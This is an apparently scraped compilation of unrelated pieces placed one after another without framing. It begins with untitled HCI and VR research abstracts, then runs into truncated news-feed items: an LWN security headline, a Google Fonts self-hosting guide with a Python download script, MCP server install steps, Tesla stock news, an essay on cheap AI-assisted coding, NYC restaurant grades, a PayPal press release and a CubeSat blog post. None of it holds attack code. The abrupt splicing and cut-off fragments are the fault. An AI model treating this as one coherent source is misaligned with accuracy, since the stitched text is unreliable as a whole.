Andreas Fender, Joerg Mueller
We present Velt, a flexible framework for multi RGB-D camera systems. Velt supports modular real-time streaming and processing of multiple RGB, depth and skeleton streams in a camera network. RGB-D data from multiple devices can be combined into 3D data like point clouds. Furthermore, we present an integrated GUI, which enables viewing and controlling all streams, as well as debugging and profiling performance. The node-based GUI provides access to everything from high level parameters like frame rate to low level properties of each individual device. Velt supports modular preprocessing operations like downsampling and cropping of streaming data. Furthermore, streams can be recorded and played back. This paper presents the architecture and implementation of Velt.
ACM CHI 2018
Andreas Fender, Philipp Herholz, Marc Alexa, Joerg Mueller
We present OptiSpace, a system for the automated placement of perspectively corrected projection mapping content. We analyze the geometry of physical surfaces and the viewing behavior of users over time using depth cameras. Our system measures user view behavior and simulates a virtual projection mapping scene users would see if content were placed in a particular way. OptiSpace evaluates the simulated scene according to perceptual criteria, including visibility and visual quality of virtual content. Finally, based on these evaluations, it optimizes content placement, using a two-phase procedure involving adaptive sampling and the covariance matrix adaptation algorithm. With our proposed architecture, projection mapping applications are developed without any knowledge of the physical layouts of the target environments. Applications can be deployed in different uncontrolled environments, such as living rooms and office spaces.
ACM UIST 2017
Andreas Fender, David Lindlbauer, Philipp Herholz, Marc Alexa, Joerg Mueller
We present HeatSpace, a system that records and empirically analyzes user behavior in a space and automatically suggests positions and sizes for new displays. The system uses depth cameras to capture 3D geometry and users' perspectives over time. To derive possible display placements, it calculates volumetric heatmaps describing geometric persistence and planarity of structures inside the space. It evaluates visibility of display poses by calculating a volumetric heatmap describing occlusions, position within users' field of view, and viewing angle. Optimal display size is calculated through a heatmap of average viewing distance. Based on the heatmaps and user constraints we sample the space of valid display placements and jointly optimize their positions. This can be useful when installing displays in multi-display environments such as meeting rooms, offices, and train stations.
ACM ISS 2017
(Best application paper award)
Andreas Fender, Hrvoje Benko, Andy Wilson
MeetAlive combines multiple depth cameras and projectors to create a room-scale omni-directional display surface designed to support collaborative face-to-face group meetings. With MeetAlive, all participants may simultaneously display and share content from their personal laptop wirelessly anywhere in the room. MeetAlive gives each participant complete control over displayed content in the room. This is achieved by a perspective corrected mouse cursor that transcends the boundary of the laptop screen to position, resize, and edit their own and others' shared content. MeetAlive includes features to replicate content views to ensure that all participants may see the actions of other participants even as they are seated around a conference table. We report on observing six groups of three participants who worked on a collaborative task with minimal assistance. Participants' feedback highlighted the value of MeetAlive features for multi-user engagement in meetings involving brainstorming and content creation.
Video: shot and edited by Ines Ben Said
ACM SUI 2015
Andreas Fender, Joerg Mueller, David Lindlbauer
We present Creature Teacher, a performance-based animation system for creating cyclic movements. Users directly manipulate body parts of a virtual character by using their hands. Creature Teacher's generic approach makes it possible to animate rigged 3D models with nearly arbitrary topology (e.g., non-humanoid) without requiring specialized user-to-character mappings or predefined movements. We use a bimanual interaction paradigm, allowing users to select parts of the model with one hand and manipulate them with the other hand. Cyclic movements of body parts during manipulation are detected and repeatedly played back - also while animating other body parts. Our approach of taking cyclic movements as an input makes mode switching between recording and playback obsolete and allows for fast and seamless creation of animations. We show that novice users with no animation background were able to create expressive cyclic animations for initially static virtual 3D creatures.
Collaborations and supervisions
TVCG 2024
Lara Lenz, Andreas Fender, Julia Chatain, Christian Holz
Asynchronous digital communication is a widely applied and well-known form of information exchange. Most pieces of technology make use of some variation of asynchronous communication systems, be it messaging or email applications. This allows recipients to process digital messages immediately (synchronous) or whenever they have time (asynchronous), meaning that purely digital interruptions can be mitigated easily. Mixed Reality systems have the potential to not only handle digital interruptions but also interruptions in physical space, e.g., caused by co-workers in workspaces or learning environments. However, the benefits of such systems previously remained untested in the context of Mixed Reality. We conducted a user study (N=26) to investigate the impact that the timing of task delivery has on the participants' performance, workflow, and emotional state. Participants had to perform several cognitively demanding tasks in a Mixed Reality workspace. Inside the virtual workspace, we simulated in-person task delivery either during tasks (i.e., interrupting the participant) or between tasks (i.e., delaying the interruption). Our results show that delaying interruptions has a significant impact on subjective metrics like the perceived performance and workload.
TVCG 2023
Tiffany Luong, Yi Fei Cheng, Max Moebus, Andreas Fender, Christian Holz
Virtual Reality (VR) systems have traditionally required users to operate the user interface with controllers in mid-air. More recent VR systems, however, integrate cameras to track the headset's position inside the environment as well as the user's hands when possible. This allows users to directly interact with virtual content in mid-air just by reaching out, thus discarding the need for hand-held physical controllers. However, it is unclear which of these two modalities—controller-based or free-hand interaction—is more suitable for efficient input, accurate interaction, and long-term use under reliable tracking conditions. While interacting with hand-held controllers introduces weight, it also requires less finger movement to invoke actions (e.g., pressing a button) and allows users to hold on to a physical object during virtual interaction. In this paper, we investigate the effect of VR input modality (controller vs. free-hand interaction) on physical exertion, agency, task performance, and motor behavior across two mid-air interaction techniques (touch, raycast) and tasks (selection, trajectory-tracing). Participants reported less physical exertion, felt more in control, and were faster and more accurate when using VR controllers compared to free-hand interaction in the raycast setting. Regarding personal preference, participants chose VR controllers for raycast but free-hand interaction for mid-air touch. Our correlation analysis revealed that participants' physical exertion increased with selection speed, quantity of arm motion, variation in motion speed, and bad postures, following ergonomics metrics such as consumed endurance and rapid upper limb assessment. We also found a negative correlation between physical exertion and the participant's sense of agency, and between physical exertion and task accuracy.
IEEE ISMAR 2022
Yi Fei Cheng, Tiffany Luong, Andreas Fender, Paul Streli, Christian Holz
Real-world work-spaces typically revolve around tables, which enable knowledge workers to comfortably perform tasks over an extended period of time during productivity tasks. Tables afford more ergonomic postures and provide opportunities for rest, which raises the question of whether they may also benefit prolonged interaction in Virtual Reality (VR). In this paper, we investigate the effects of tabletop surface presence in situated VR settings on task performance, behavior, and subjective experience. In an empirical study, 24 participants performed two tasks (selection, docking) on virtual interfaces placed at two distances and two orientations. Our results show that a physical tabletop inside VR improves comfort, agency, and task performance while decreasing physical exertion and strain of the neck, shoulder, elbow, and wrist, assessed through objective metrics and subjective reporting. Notably, we found that these benefits apply when the UI is placed on and aligned with the table itself as well as when it is positioned vertically in mid-air above it. Our experiment therefore provides empirical evidence for integrating physical table surfaces into VR scenarios to enable and support prolonged interaction. We conclude by discussing the effective usage of surfaces in situated VR experiences and provide initial guidelines.
Video edited by Paul Streli
ECCV 2022
Jiaxi Jiang, Paul Streli, Huajian Qiu, Andreas Fender, Larissa Laich, Patrick Snape, Christian Holz
Today's Mixed Reality head-mounted displays track the user's head pose in world space as well as the user's hands for interaction in both Augmented Reality and Virtual Reality scenarios. While this is adequate to support user input, it unfortunately limits users' virtual representations to just their upper bodies. Current systems thus resort to floating avatars, whose limitation is particularly evident in collaborative settings. To estimate full-body poses from the sparse input sources, prior work has incorporated additional trackers and sensors at the pelvis or lower body, which increases setup complexity and limits practical application in mobile settings. In this paper, we present AvatarPoser, the first learning-based method that predicts full-body poses in world coordinates using only motion input from the user's head and hands. Our method builds on a Transformer encoder to extract deep features from the input signals and decouples global motion from the learned local joint orientations to guide pose estimation. To obtain accurate full-body motions that resemble motion capture animations, we refine the arm joints' positions using an optimization routine with inverse kinematics to match the original tracking input. In our evaluation, AvatarPoser achieved new state-of-the-art results in evaluations on large motion capture datasets (AMASS). At the same time, our method's inference speed supports real-time operation, providing a practical interface to support holistic avatar control and representation for Metaverse applications.
Video co-edited with Paul Streli
ACM CHI 2022
Paul Streli, Jiaxi Jiang, Andreas Fender, Manuel Meier, Hugo Romat, Christian Holz
Despite the advent of touchscreens, typing on physical keyboards remains most efficient for entering text, because users can leverage all fingers across a full-size keyboard for convenient typing. As users increasingly type on the go, text input on mobile and wearable devices has had to compromise on full-size typing. In this paper, we present TapType, a mobile text entry system for full-size typing on passive surfaces—without an actual keyboard. From the inertial sensors inside a band on either wrist, TapType decodes and relates surface taps to a traditional QWERTY keyboard layout. The key novelty of our method is to predict the most likely character sequences by fusing the finger probabilities from our Bayesian neural network classifier with the characters’ prior probabilities from an n-gram language model. In our online evaluation, participants on average typed 19 words per minute with a character error rate of 0.6% after 30 minutes of training. Expert typists thereby consistently achieved more than 25 WPM at a similar error rate. We demonstrate applications of TapType in mobile use around smartphones and tablets, as a complement to interaction in situated Mixed Reality outside visual control, and as an eyes-free mobile text input method using an audio feedback-only interface.
Video fully created by Mohamed Kari
IEEE ISMAR 2021
Mohamed Kari, Tobias Grosse-Puppendahl, Luis Falconeri Coelho, Andreas Fender, David Bethge, Reinhard Schütte, Christian Holz
Despite the advances in machine perception, semantic scene understanding is still a limiting factor in mixed reality scene composition. In this paper, we present TransforMR, a video see-through mixed reality system for mobile devices that performs 3D-pose-aware object substitution to create meaningful mixed reality scenes. In real-time and for previously unseen and unprepared real-world environments, TransforMR composes mixed reality scenes so that virtual objects assume behavioral and environment-contextual properties of replaced real-world objects. This yields meaningful, coherent, and human-interpretable scenes, not yet demonstrated by today's augmentation techniques. TransforMR creates these experiences through our novel pose-aware object substitution method building on different 3D object pose estimators, instance segmentation, video inpainting, and pose-aware object rendering. TransforMR is designed for use in the real world, supporting the substitution of humans and vehicles in everyday scenes, and runs on mobile devices using just their monocular RGB camera feed as input. We evaluated TransforMR with eight participants in an uncontrolled city environment employing different transformation themes. Applications of TransforMR include real-time character animation analogous to motion capturing in professional film making, however without the need for preparation of either the scene or the actor, as well as narrative-driven experiences that allow users to explore fictional parallel universes in mixed reality.
Video fully created by Soeren Qvist Jensen
ACM CHI 2018
Soeren Qvist Jensen, Andreas Fender, Joerg Mueller
We present Inpher, a virtual reality system for setting physical properties of virtual objects using mid-air interaction. Users simply grasp virtual objects and mimic their desired physical movement. The physical properties required to fulfill that movement will then be inferred directly from that motion. We provide a 3D user interface that does not require users to have an abstract model of physical properties. Our approach leverages users' real world experiences with physics. We conducted a bodystorming to investigate users' mental model of physics. Based on our iterative design process, we implemented techniques for inferring mass, bounciness and friction. We conducted a case study with 15 participants with varying levels of physics education. The results indicate that users are capable of demonstrating the required interactions and achieve satisfying results.
Security updates for Monday
Linux Weekly News
lwn.net
2025-09-15 15:36:11
Security updates have been issued by AlmaLinux (cups, kernel, and mysql-selinux and mysql8.4), Debian (cjson, jetty9, and shibboleth-sp), Fedora (bustle, cef, checkpointctl, chromium, civetweb, cups, forgejo, jupyterlab, kernel, libsixel, linenoise, maturin, niri, perl-Cpanel-JSON-XS, python-uv-buil...
A common place to get a web font is Google Fonts.
If you want to use a font from Google Fonts, you should not just paste the code they give you.
Instead, you should download the font files and put them on your webserver.
If you want a font used on this website (like Noto Sans and Fira Code), copy the relevant files from here and skip steps 0 and 1.
THIS IS NOT LEGAL ADVICE
I AM NOT YOUR LAWYER
ENSURE THAT YOUR USE OF THE FONT WILL COMPLY WITH THE LICENSE
Select "Get embed code" (don't paste the code it gives you).
Select which options you want included.
In the HTML code it gives you, it should have something like <link href="https://fonts.googleapis.com/css2?family=Fira+Code&display=swap" rel="stylesheet">.
Download the file using the URL after the href (https://fonts.googleapis.com/css2?family=Fira+Code&display=swap in this case).
Download each font referenced in the CSS file you just downloaded.
Put all of the font files you just downloaded in a folder, ideally with a name that will change each update and a long cache time (like /Assets/Fira/Code/2025-8-13/).
Copy the CSS file into that folder.
Change the CSS to use relative links.
(e.g. change src: url(https://fonts.gstatic.com/s/firacode/v26/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_D1sJVD7Ng.woff2) format('woff2'); into src: url(uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_D1sJVD7Ng.woff2) format('woff2');)
Paste the license of the font into a file. To find the license of a Google font, do:
Add a link to the font LICENSE and ensure that your usage of the font follows the license of the font.
If you can't understand these steps, see how it was done here.
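Not from the original post: a small Python sketch automating steps 2 through 7 above (download the CSS, download each referenced font, rewrite the URLs to be relative), using the example URL and folder from this page.

# Fetch the Google Fonts CSS and every font file it references,
# rewriting the CSS to use relative URLs.
import pathlib
import re
import urllib.request

CSS_URL = "https://fonts.googleapis.com/css2?family=Fira+Code&display=swap"
OUT = pathlib.Path("Assets/Fira/Code/2025-8-13")  # versioned folder, step 5
OUT.mkdir(parents=True, exist_ok=True)

# A browser-like User-Agent makes Google serve woff2 sources.
req = urllib.request.Request(CSS_URL, headers={"User-Agent": "Mozilla/5.0"})
css = urllib.request.urlopen(req).read().decode("utf-8")

for url in set(re.findall(r"url\((https://[^)]+)\)", css)):
    name = url.rsplit("/", 1)[-1]
    urllib.request.urlretrieve(url, OUT / name)  # step 4: fetch each font
    css = css.replace(url, name)                 # step 7: relative links

(OUT / "fonts.css").write_text(css)              # step 6: CSS in the folder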
Show HN: MCP Server Installation Instructions Generator
Generate MCP Server Installation Instructions for Cursor, Visual Studio Code, Claude Code, Claude Desktop, Windsurf, ChatGPT, Gemini CLI and more
How To Install a Remote MCP server?
Instructing users on how to install an MCP server is hard, because
configuration is different for each client. If this has been your
experience hosting an MCP server for your product, this site is for
you! Just enter your server URL below and let us generate instructions
for the most widely used clients, ready for you to copy and paste into
your product's readme or documentation.
How do I install a remote MCP server on Claude Code?
To install a remote MCP server on Claude Code:
Open a terminal in Claude Code
Run the command: claude mcp add --transport http [server-name] [server-url]
Replace [server-name] with your desired name and [server-url] with the MCP server URL
Use the /mcp command within Claude Code to verify the server is connected
How do I install a remote MCP server on Cursor?
To install a remote MCP server on Cursor:
Locate your mcp.json configuration file
Add your server configuration to the mcpServers object with the server URL
Save the file and restart Cursor to apply the changes
Alternatively, use the direct installation link if provided by the server (see the sketch below)
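As a sketch, a minimal mcp.json entry of this shape (the bracketed names are placeholders, and the exact schema may vary by Cursor version) looks like:

{
  "mcpServers": {
    "[server-name]": {
      "url": "[server-url]"
    }
  }
}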
How do I install a remote MCP server on Claude Desktop?
To install a remote MCP server on Claude Desktop:
Open Claude Desktop application
Navigate to Settings → Connectors → Add Custom Connector
Enter a name for your server
Paste the remote MCP server URL
Click Add to complete the installation
How do I install a remote MCP server on VS Code?
To install a remote MCP server on VS Code:
Open a terminal and run:
code --add-mcp '{"type":"http","name":"[server-name]","url":"[server-url]"}'
Open the .vscode/mcp.json file in VS Code
Click "Start server" to activate the connection
Alternatively, use the installation link button if available
How do I install a remote MCP server on Windsurf?
To install a remote MCP server on Windsurf:
Open your Windsurf MCP configuration file
Add the server configuration to the mcpServers object
Use serverUrl as the key for the remote URL
Save the configuration and restart Windsurf
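Putting those steps together, a minimal sketch of the Windsurf configuration (placeholders as above):

{
  "mcpServers": {
    "[server-name]": {
      "serverUrl": "[server-url]"
    }
  }
}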
How do I install a remote MCP server on ChatGPT?
To install a remote MCP server on ChatGPT:
Navigate to Settings → Connectors (requires admin permissions in Team/Enterprise workspaces)
Add a custom connector with your server URL
The connector will be available in Composer → Deep research tool
You may need to add the server as a source
Note: Connectors can only be used with Deep Research
How do I install a remote MCP server on Gemini CLI?
To install a remote MCP server on Gemini CLI:
Locate your Gemini CLI configuration file at ~/.gemini/settings.json
Add your server to the mcpServers object with an httpUrl key
Include headers with Accept: application/json, text/event-stream
Save the file and restart Gemini CLI
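Combining those steps into a minimal sketch of the relevant ~/.gemini/settings.json fragment (placeholders as above):

{
  "mcpServers": {
    "[server-name]": {
      "httpUrl": "[server-url]",
      "headers": {
        "Accept": "application/json, text/event-stream"
      }
    }
  }
}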
What is a remote MCP server?
A remote MCP (Model Context Protocol) server is a web-based service that provides additional capabilities to AI assistants. Unlike local MCP servers that run on your machine, remote servers are hosted on the internet and accessed via HTTPS. Remote MCP servers can also implement MCP Server authentication for personalized tools and context.
Can I contribute to the MCP Server installation instructions generator?
Show HN: Daffodil – Open-Source Ecommerce Framework to connect to any platform
Read through our contributing guidelines to learn about our submission process, coding rules, and more.
Want to Help?
Want to report a bug, contribute some code, or improve the documentation? Excellent! Read up on our guidelines for contributing and then check out one of our issues labeled as good first issue or good first challenge.
Note: the checkout package is currently a legacy package; there is no reason to use it. However, the checkout package may eventually be filled with extracts from the cart and order packages.
Think Daffodil is the bee's knees? Give our repo a star ⭐ ❤️.
Elon Musk buys nearly $1bn in Tesla stock in push for more control
Guardian
www.theguardian.com
2025-09-15 15:15:18
Tesla shares rose by more than 8% after news of CEO’s transactions, a week after he was offered $1tn pay package Elon Musk, the Tesla CEO, has purchased nearly $1bn worth of the electric-vehicle maker’s stock, a regulatory filing showed, reinforcing Musk’s push for greater control over Tesla. Tesla ...
Elon Musk, the Tesla CEO, has purchased nearly $1bn worth of the electric-vehicle maker's stock, a regulatory filing showed, reinforcing Musk's push for greater control over Tesla.
Tesla shares jumped more than 8% in premarket trading on Monday following the news.
Tesla is racing to meet its ambitious targets on robotaxis, artificial intelligence and robotics as it looks to pivot from an EV maker to a tech leader. As of December, Musk held a roughly 13% stake, according to LSEG data.
Musk disclosed buying 2.57m shares in open-market transactions on Friday, paying between $372.37 and $396.54 per share, according to the filing.
Tesla shares jumped more than 7% on Friday, extending solid gains from the previous session. The stock, which is down about 2% this year, is on track to record a third straight session of gains if premarket moves are sustained.
Musk has consistently demanded a bigger stake and increased voting power at Tesla, having also threatened to build AI and robotics products outside of Tesla if he cannot get 25% voting power.
Earlier this month, Tesla's board proposed a trillion-dollar compensation plan for Musk, in a huge vote of confidence for Musk's leadership from the board, even as the company stumbles amid heated competition and flailing EV demand.
On Friday, board chair Robyn Denholm dismissed concerns that Musk's political activity had hurt sales and said the billionaire was back "front and center" at the company after several months at the White House.
Musk's political activity and public clashes with Donald Trump had stirred worries among investors about distractions and potential lost sales, weighing on the company's stock this year.
The genies are out of the bottle. Let’s take as a given that augmented coding is steadily reducing the cost, skill barriers, and time needed to develop software. (Interesting debate to be had—another day.)
Will this lead to fewer programmers or more programmers?
Economics gives us two contradictory answers simultaneously.
Substitution. The substitution effect says we'll need fewer programmers—machines are replacing human labor.
Jevons'. Jevons' paradox predicts that when something becomes cheaper, demand increases as the cheaper good is economically viable in a wider variety of cases.
Both can't be right. Or can they?
Another way of looking at the contradiction—if programs are cheaper to write today than they were yesterday, then we should be more likely to write them today.
But, if programs are going to be cheaper to write tomorrow, then why not just wait until the cost goes to zero? This is the deflationary spiral, the urge to defer investment leading to less economic activity leading to lower prices leading to the urge to defer investment.
What’s a software executive to do? A programmer? What we’d like is a strategy that:
Lets us act today.
Doesn't rely on information that just isn't available.
Leads to reasonable outcomes regardless of which way the rock tumbles.
Traditional deflation is destructive because it reflects economic weakness—falling demand, broken confidence, shrinking money supply. Programming deflation is different. It's driven by genuine productivity gains. AI isn't just redistributing the same pie; it's making the pie-making process fundamentally cheaper.
This creates some interesting paradoxes:
Delay vs. Experiment: Yes, you might wait for better tools. But when experimentation costs approach zero, the urge to try something right now often wins. How many of us have spun up a quick prototype just because we could?
Quality Bifurcation
: Cheap code floods the market. Most of it is terrible. But the gap between commodity code and carefully crafted software widens. The middle disappears.
Value Migration
: Writing code becomes like typing—a basic skill, not a career. Value moves to understanding what to build, how systems fit together, and navigating the complexity of infinite cheap software pieces.
Here's where programming deflation breaks the traditional model entirely. In economic deflation, the spiral is self-reinforcing and destructive. In programming deflation, cheaper tools might actually accelerate innovation—when programming accelerates programming. Better tools. Better models. The reinforcing loop kicks in.
Every small business becomes a software company. Every individual becomes a developer. The cost of "what if we tried..." approaches zero.
Publishing was expensive in 1995, exclusive. Then it became free. Did we get less publishing? Quite the opposite. We got an explosion of content, most of it terrible, some of it revolutionary.
So what do we do while we're in this deflation? A few thoughts:
Embrace the Commodity
: Use the cheap tools. Build the obvious stuff with AI. Save your energy for the hard problems.
Focus on Integration
: The bottleneck isn't writing code anymore. It's making all these cheap software pieces work together coherently.
Develop Taste
: When anyone can build anything, knowing what's worth building becomes the skill.
Think in Systems
: Individual programs are commoditized. Complex, adaptive systems are not.
In a world of abundant cheap code, what becomes scarce? Understanding. Judgment. The ability to see how pieces fit together. The wisdom to know what not to build.
We're not just experiencing technological change. We're watching the basic economics of software development transform in real time. The question isn't whether programming deflation will happen—it's already happening. The question is how we adapt to abundance.
Here's the beautiful thing about focusing on understanding, integration, and judgment: these skills matter whether we end up with fewer programmers or more programmers. If automation replaces routine coding, these human skills become the differentiator. If cheap tools create an explosion of new programmers, these skills separate signal from noise even more than they did a year ago.
Cultivating judgement also improves one's competitive position vis-à-vis those who use the tools simply to churn out the same features faster.
Don’t bother predicting which future we'll get. Build capabilities that thrive in either scenario.
Interested in a private, custom talk for your organization on the effects of AI on software development & how y’all can navigate them? Contact me! I still have some slots open in the last quarter of the year.
15 Years After Their Creation, Do NYC Restaurant Grades Still Matter to Diners?
hellgate
hellgatenyc.com
2025-09-15 15:06:00
The number of "A" grades are slipping citywide—not that patrons we spoke to really care....
On July 15, Carbone, the world-famous Italian restaurant graced by Kardashians, A-list rappers, models, It Girls, and the Obamas, whose popularity birthed a private dining club and outposts in Miami, Vegas, Doha, and Riyadh, fell short by one metric: The New York City Department of Health and Mental Hygiene's inspection process. The restaurant that launched a thousand Instagram posts received a "B," along with an additional fine for failing to display its letter grade card, as restaurants have been legally required to do for the past 15 years.
The New York Post trumpeted the subpar grade in an August 28 article, headlined "Carbone hid 'B' health rating—with latest DOH inspection finding dirty dishes, food left above safe temps."
Post readers reacted with disdain in the comments section: "They will be empty after this B rating. Someone is asleep at the helm," one predicted.
But on a drizzly Thursday night outside of Carbone, a month and a half after their last DOH inspection but less than a week after the scathing Post article, we couldn't find anyone who thought the lower grade mattered. (We didn't see the letter grade displayed, either.)
PayPal Ushers in a New Era of Peer-to-Peer Payments, Reimagining How Money Moves to Anyone, Anywhere
Send and receive money as easily as sending a text, across apps, borders, and currencies
/PRNewswire/ -- On the heels of the PayPal World announcement, a global platform connecting the world's largest digital payment systems and wallets, PayPal today introduced PayPal links, a new way to send and receive money through a personalized, one-time link that can be shared in any conversation.
PayPal users in the U.S. can begin creating personalized payment links today, with international expansion to the UK, Italy, and other markets starting later this month. By making payments this simple and universal, PayPal links helps drive new customer acquisition and brings more users into the PayPal ecosystem.
The peer-to-peer (P2P) experience is about to go even further. Crypto will soon be directly integrated into PayPal's new P2P payment flow in the app. This will make it more convenient for PayPal users in the U.S. to send Bitcoin, Ethereum, PYUSD, and more, to PayPal, Venmo, as well as a rapidly growing number of digital wallets across the world that support crypto and stablecoins.
Expanding what people can do with PayPal also comes with reassurance around how personal payments are handled. As always, friends-and-family transfers through Venmo and PayPal are exempt from 1099-K reporting. Users won't receive tax forms for gifts, reimbursements, or splitting expenses, helping ensure that personal payments stay personal.
"For 25 years, PayPal has revolutionized how money moves between people. Now, we're taking the next major step," said
Diego Scotti, General Manager, Consumer Group at PayPal. "Whether you're texting, messaging, or emailing, now your money follows your conversations. Combined with PayPal World, it's an unbeatable value proposition, showing up where people connect, making it effortless to pay your friends and family, no matter where they are or what app they're using."
P2P is a cornerstone of PayPal's consumer experience, driving engagement and bringing more users into the ecosystem. P2P and other consumer total payment volume saw solid growth in the second quarter, increasing 10% year-over-year as the company focused on improving the experience and increasing user discoverability to make it easier than ever to move money globally. Plus, Venmo saw its highest TPV growth in three years. With PayPal World unlocking seamless interoperability, P2P is poised for even greater momentum in the future as PayPal and Venmo connect to billions of wallets worldwide.
How PayPal links work:
Create a personalized link – Open the PayPal app, enter the details of your payment or request, and generate a unique, one-time link to share.
Always the right person – Each link is private, one-time use, and created for a specific transaction.
Drop it anywhere – Send your link in a text, DM, email, or chat. Add a note, emoji, or payment note.
Manage payment activity – Unclaimed links expire after 10 days. Users can send a reminder or even cancel the payment or request before the link is claimed with the PayPal app.
Tap and done – The recipient taps the link and either completes or accepts the payment within the PayPal App with their PayPal account.
Funds are instant – The recipient will get immediate access to their funds with a PayPal Balance account once accepted.
About PayPal
PayPal has been revolutionizing commerce globally for more than 25 years. Creating innovative experiences that make moving money, selling, and shopping simple, personalized, and secure, PayPal empowers consumers and businesses in approximately 200 markets to join and thrive in the global economy. For more information, visit https://www.paypal.com, https://about.pypl.com/ and https://investor.pypl.com/.
About PayPal USD (PYUSD)
PayPal USD is issued by Paxos Trust Company, LLC, a fully chartered limited purpose trust company. Paxos is licensed to engage in Virtual Currency Business Activity by the New York State Department of Financial Services. Reserves for PayPal USD are fully backed by U.S. dollar deposits, U.S. Treasuries and similar cash equivalents, and PayPal USD can be bought or sold through PayPal and Venmo at a rate of $1.00 per PayPal USD.
PayPal, Inc. (NMLS ID #: 910457) is licensed to engage in Virtual Currency Business Activity by the New York State Department of Financial Services.
These are CubeSats. Satellites that are going to space—or at least, the ones I have here are prototypes. But these have one thing in common: they're all powered by either a Raspberry Pi, or a microcontroller.
There are already Pis in space, like on Mark Rober's SatGus, on GASPACS, and the Astro Pis on the Space station. Another Pi is going up this weekend, which is why I'm posting this today. I'll get to that one, but I wanted to spend some time talking about two things that fascinate me: Raspberry Pis, and putting them in space!
In this post, I'll cover:
What is a CubeSat
Who builds and launches CubeSats
How you can build your own CubeSat
Then for a bonus, in today's video, I interviewed two people helping students launch SilverSat into space (this weekend!), and a YouTuber who I've learned a lot from about tracking satellites (including CubeSats) from your own backyard!
The rest of this post contains a lightly-edited transcript of the video above.
So let's dive in.
What's a CubeSat?
What's a CubeSat? Well, it's in the name—it's a satellite that's a cube!
But they don't have to be a cube, these smallest ones are '1U', or 10 x 10 x 10 centimeters. You can also find 2U CubeSats, like the taller Build a CubeSat, which is 20 centimeters tall. (Well, technically the current prototype is 1.5U).
SatGus, Mark Rober's satellite taking space selfies, is a whopping 12U! They needed all that extra space to fit a phone, a mechanism to deploy the phone, a camera to take the selfie, a Raspberry Pi to control the phone, and redundant systems for everything. They've already taken thousands of selfies, and SatGus has me beat. My best Pi might get to 3.4 Gigahertz, but the Pi on SatGus is whizzing through space at almost 17,000 miles per hour. That's 7,570 meters per second for everyone else in the world.
But back to CubeSats. Having standards means you can build off existing work for the hard things, like a space-rated Aluminum frame, or the complex EPS, or Electrical Power System board.
Then you can add in custom parts, like a Pi to run experiments, a communications board with antennas and radios, cameras, sensors, and more!
And these cubesats have normal screw-on antennas, but the way these things are deployed, you only get 10x10x10 centimeters—you can't have an antenna poking out the top. So they use cool things like flexible tape antennas that pop out once your CubeSat deploys.
What else makes CubeSats cool?
Well, how about price? In the old days, you had to have like $10 million to build a satellite, and $60+ million to launch it into space.
Today, you can build a space-ready CubeSat using a few thousand dollars of parts. Then you can launch it on a rideshare for... well, $85 grand. Which is a lot, but it's not $60 million-a-lot.
So most of us won't be launching one of these things into space, unless maybe you can get a grant. But that doesn't mean they're not useful to us.
Who builds CubeSats?
Like with many projects, I love these things for the challenge, the way they break some of my assumptions, like working with Raspberry Pis.
If you're building a device that's less than 2 kilograms, has 1.8W of maximum continuous power draw, and needs to be operated remotely—even for just a month—you're immediately going to change your assumptions about how you build things.
I would hack Home Assistant onto a mini PC to monitor some sensors if I was feeling lazy—but that Mini PC would use an order of magnitude too much power for a CubeSat (much less the internal volume it would occupy).
On CubeSats, every millimeter, and every milliAmp has to be accounted for.
So to me, CubeSats are like Swiss watches of modern electronics. How many sensors can you fit in one? How much throughput can you get on a tiny radio with a small antenna? Can you get enough power out of tiny solar cells to keep the main flight computer working? How do you control thermals without air? How do you design it so it can recover from a complete power loss?
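To make the power question concrete, here's a back-of-the-envelope orbit-average budget in Python. The numbers are illustrative guesses of mine, not figures from any CubeSat mentioned here.

# Does a 1U CubeSat's solar input cover its loads over one ~92-minute orbit?
SUNLIT_FRACTION = 0.62          # rough fraction of a low orbit in sunlight
SOLAR_INPUT_W = 2.0             # small body-mounted cells, one face lit
LOADS_W = {"flight computer": 0.4, "radio (avg)": 0.3, "sensors": 0.1}

generated = SOLAR_INPUT_W * SUNLIT_FRACTION   # orbit-average watts in
consumed = sum(LOADS_W.values())              # orbit-average watts out
margin = generated - consumed
print(f"in: {generated:.2f} W, out: {consumed:.2f} W, margin: {margin:+.2f} W")
# A negative margin means the battery drains a little every orbit,
# which is why every milliamp has to be accounted for.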
Every step of the way there are challenges; and that's before we even launch one! Someone who I think illustrates this best is Manuel, with his Build a CubeSat project. He's working on this Cubesat:
His first launch had many small problems. But also great learning, especially around redundancy and how to get the thing off the launch stand without problems.
And you're not only dealing with hardware, but also with software. And software that, at its core, has to be remotely accessed. And not only remote, but also wireless, meaning anyone else on earth within range can access it too.
So how do you keep it secure? That's something Tim from Ethos Labs is also dealing with, with this, his T.E.M.P.E.S.T. CubeSat:
This thing is actually made to be not secure. It has intentional vulnerabilities, and he uses those to teach people different ways to make their CubeSats more secure.
You have complex hardware, running in limited space, with limited power and communications, and you want to cram in as much functionality as possible.
Do you see where I'm going with this? That kind of problem is perfect for the microcontrollers and low-power SBCs that I love testing and playing with every day.
Except instead of me worrying about something consuming 10 watts, these guys are looking at a power budget of one watt. Or less!
These problems are hard. And not everyone has the patience for a completely custom project like Build a CubeSat, so there are also some small companies building kits to help you learn all these lessons with a little less stress.
Like what hardware do you need for a 100% self-contained CubeSat? And how do you get it certified for flight on a SpaceX rocket?
Your own CubeSat
Well, I'll quickly cover two products that are meant for like STEM classroom education, one from the lower end, and one that's based on a CubeSat that just flew this summer.
The first one is the MySat Kit, which you can buy from MySat in Ukraine. It comes with a board powered by an ESP32 with a camera, light sensors, an LED, gyroscope, accelerometer, barometer, clock, and a few other boards. And these are all off-the-shelf components you can buy replacements for or use 'em with other hardware, like a Raspberry Pi.
The way it's put together won't hold up on a rocket launch, but it's not meant for that. It's meant to show you how it's built, how you can communicate with it, and that sort of thing.
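Since the sensor boards are ordinary off-the-shelf I2C parts, a first sanity check on a kit like this could be a bus scan from MicroPython on the ESP32; the SCL/SDA pin numbers below are my guess, not the kit's documented pinout:

```python
# MicroPython on an ESP32: scan the I2C bus to confirm the sensors answer.
# Pin assignments are assumptions -- check the kit's pinout before wiring.
from machine import I2C, Pin

i2c = I2C(0, scl=Pin(22), sda=Pin(21), freq=400_000)
for addr in i2c.scan():
    print("Found I2C device at address 0x{:02x}".format(addr))
```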
It took like an hour to build, and once I put it together I tried flashing the flight control firmware with my Mac... but I ran into some issues with Arduino IDE, and that's a me problem, not so much a MySat problem. Plus the team behind it has a whole war going on that they've been dealing with, so I'll be patient and try getting it going later.
